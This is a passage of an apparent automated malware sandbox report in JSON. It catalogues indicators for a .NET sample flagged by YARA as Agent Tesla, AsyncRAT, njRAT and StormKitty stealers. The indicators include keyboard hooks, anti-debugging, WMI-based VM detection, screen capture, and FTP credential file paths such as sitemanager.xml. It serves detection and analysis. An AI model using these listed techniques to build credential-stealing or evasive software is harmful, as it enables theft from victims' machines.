\"System.Security.Cryptography.X509Certificates.RSACryptoServiceProvider.CreateDecryptor\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-212", "type": 2, "relevance": 1, "name": "Contains ability to perform decryption (API string)", "description": "Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-106", "type": 2, "relevance": 1, "name": "Contains ability to decode base64 data", "description": "Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-352", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption/decryption using RSA algorithm", "description": "Found string \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-358", "type": 2, "relevance": 1, "name": "Contains ability to encrypt data using RSA (Dotnet String)", "description": "Observed string: \"System.Security.Cryptography.X509Certificates.RSACryptoServiceProvider.CreateEncryptor\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-445", "type": 2, "relevance": 1, "name": "Contains ability to perform AES decryption (Dotnet String)", "description": "Observed string: \"System.Security.Cryptography.X509Certificates.AesCryptoServiceProvider.CreateDecryptor\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "Found reference to API \"iption=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00006044.00000000.66236.002F0000.00000004.mdmp, 00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-140", "relevance": 1, "name": "Contains ability to perform symmetric crypto operations", "description": "Observed namespace \"System.Security.Cryptography.RijndaelManaged\" and TypeReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"System.Security.Cryptography.AesCryptoServiceProvider\" and TypeReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-118", "relevance": 1, "name": "Contains ability to perform crypto operations", "description": "Observed namespace \"System.Security.Cryptography\" in [Source: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"]\n Observed namespace \"System.Security.Cryptography.X509Certificates\" in [Source: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"]", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-106", "relevance": 1, "name": "Contains ability to decode string content at runtime (Dotnet)", "description": "Observed function \"FromBase64String\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"ToBase64String\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-166", "relevance": 1, "name": "Contains ability to perform CryptoStream operations (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.CryptoStream\" and TypeReference \"FlushFinalBlock\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-141", "relevance": 1, "name": "Contains ability to perform asymmetric crypto operations", "description": "Observed namespace \"System.Security.Cryptography.RSACryptoServiceProvider\" and TypeReference \"VerifyHash\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-168", "relevance": 1, "name": "Contains ability to perform symmetric decryption (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.SymmetricAlgorithm\" and TypeReference \"CreateDecryptor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-165", "relevance": 1, "name": "Contains ability to perform symmetric encryption (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.SymmetricAlgorithm\" and TypeReference \"CreateEncryptor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to decode base64 data", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains ability to decrypt data using RSA (Dotnet String)\n Matched sigs: Contains ability to import cryptographic keys (seen in ransomware)\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Contains ability to perform decryption (API string)\n Matched sigs: Contains asymmetric cryptographic functions (API string)\n Matched sigs: Contains ability to decrypt/decode data\n Matched sigs: Contains ability to decode base64 data\n Matched sigs: Contains ability to perform encryption/decryption using RSA algorithm\n Matched sigs: Contains ability to encrypt data using RSA (Dotnet String)\n Matched sigs: Contains ability to perform AES decryption (Dotnet String)\n Matched sigs: Found Crypto currency wallets related strings\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Contains ability to perform symmetric crypto operations\n Matched sigs: Dotnet file contains encryption/decryption functions\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains ability to perform crypto operations\n Matched sigs: Contains ability to decode string content at runtime (Dotnet)\n Matched sigs: Contains ability to perform CryptoStream operations (Dotnet)\n Matched sigs: Contains key cryptographic functions of the CryptoAPI\n Matched sigs: Contains ability to perform asymmetric crypto operations\n Matched sigs: Contains ability to perform symmetric decryption (Dotnet)\n Matched sigs: Contains ability to perform symmetric encryption (Dotnet)\n Matched sigs: Contains cryptographic functions of the CryptoAPI", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-91", "type": 2, "relevance": 1, "name": "Contains ability to hook/unhook windows functions (API string)", "description": "Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"SetWindowsHookEx\" (Indicator: \"SetWindowsHook\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"SetWindowsHookEx\" (Indicator: \"SetWindowsHook\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00006044.00000000.66236.002F0000.00000004.mdmp, 00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLEF73F41ECED2D445D80D844164DCC]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE7B1B183B21DF45318E4AF027BC83]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"9ncalrpc:[epmapper,Security=Impersonation Dynamic False]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"B+ncalrpc:[OLE7B1B183B21DF45318E4AF027BC83]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"B+ncalrpc:[OLE7B1B183B21DF45318E4AF0,\" (Indicator: \"ncalrpc\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"GetWindowThreadProcessId\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"Rectangle\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: GDI32.DLL)\n Found string \"WriteSingle\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: WMINET_UTILS.DLL)\n Found string \"Clone\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: WMINET_UTILS.DLL)\n Found string \"Escape\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: GDI32.DLL)\n Found string \"ShutdownBlockReasonCreate\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"GetKeyboardState\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"SetThreadExecutionState\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: KERNEL32.DLL)\n Found string \"GetKeyState\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"RtlSetProcessIsCritical\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: NTDLL.DLL)\n Found string \"IsAdmin\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: WBEMCOMN2.DLL)\n Found string \"BCryptCloseAlgorithmProvider\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: BCRYPT.DLL)\n Found string \"BCryptOpenAlgorithmProvider\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: BCRYPT.DLL)\n Found string \"SetProcessShutdownParameters\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentProcess\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: KERNELBASE.DLL)\n Found string \"GetParent\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"CheckRemoteDebuggerPresent\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: KERNEL32.DLL)\n Found string \"BCryptDecrypt\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: BCRYPT.DLL)\n Found string \"BCryptEncrypt\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: BCRYPT.DLL)\n Found string \"GetKeyboardLayout\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"GetForegroundWindow\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"GetConsoleWindow\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: KERNEL32.DLL)\n Found string \"ShowWindow\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"ToUnicodeEx\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)\n Found string \"UnhookWindowsHookEx\" (Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1, API is part of module: USER32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" claims program is from Wed Mar 12 17:39:59 2104", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-161", "relevance": 1, "name": "Contains ability execute applications in hidden mode (Dotnet)", "description": "Observed Namespace \"System.Diagnostics.ProcessStartInfo\" and MemberReference \"set_CreateNoWindow\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" at 00000000-00006044-00000105-6446889", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "string-55", "type": 2, "relevance": 10, "name": "Found a reference to a WMI query string known to be used for VM detection", "description": "\"Select * from Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"SELECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"SELECT * FROM win32_operatingsystem\" (Indicator: \" win32_operatingsystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"Select ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"SELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"Select * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" win32_pnpentity\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n \"rom Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"elect ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"om Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"SELECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n \"SELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n \"elect * from Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ELECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"SELECT * FROM win32_operatingsystem\" (Indicator: \" win32_operatingsystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"elect ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"elect * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n \"ELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" win32_pnpentity\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"root\\CIMV2\" (Indicator: \"root\\cimv2\"; in File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"\\\\HAPUBWS-PC\\root\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"\" (Indicator: \"root\\cimv2\"; in Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"\\HAPUBWS-PC\\root\\CIMV2:Win32_Processor.DeviceID=\"CPU0\"\" (Indicator: \"root\\cimv2\"; in Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"\\HAPUBWS-PC\\root\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"\" (Indicator: \"root\\cimv2\"; in Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"root\\CIMV2\" (Indicator: \"root\\cimv2\"; in Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-8", "type": 13, "relevance": 10, "name": "YARA signature match - generic stealer", "description": "YARA signature Malware.Stealer matched on file \"sample.bin\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-133", "type": 13, "relevance": 10, "name": "YARA signature match – WorldWind stealer", "description": "YARA signature WorldWind stealer matched on file \"sample.bin\"\n YARA signature WorldWind stealer matched on process \"00000000-00006044\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-4", "type": 13, "relevance": 9, "name": "YARA signature match - Agent Tesla", "description": "YARA signature Malware.Agent Tesla matched on file \"sample.bin\"\n YARA signature Malware.Agent Tesla matched on process \"00000000-00006044\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-6", "type": 13, "relevance": 10, "name": "YARA signature match - AsyncRAT", "description": "YARA signature Malware.AsyncRAT matched on file \"sample.bin\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"win_njrat_g0\" matched file \"sample.bin\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MALWARE_Win_StormKitty\" matched file \"sample.bin\" as \"Detects StormKitty infostealer\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "string-11", "type": 2, "relevance": 6, "name": "Found FTP credentials location strings", "description": "\"recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"sitemanager.xml\" (Indicator: \"sitemanager.xml\") in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "origin": "File/Memory", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "stream-72", "type": 1, "relevance": 3, "name": "Contains ability to capture the screen", "description": "System.Drawing.Graphics::CopyFromScreen(System.Drawing.Point,System.Drawing.Point,System.Drawing.Size) at 74d47b52ea65535614a0d1c0e6076ff9-600016e-DesktopScreenshot~Make", "origin": "Hybrid Analysis Technology", 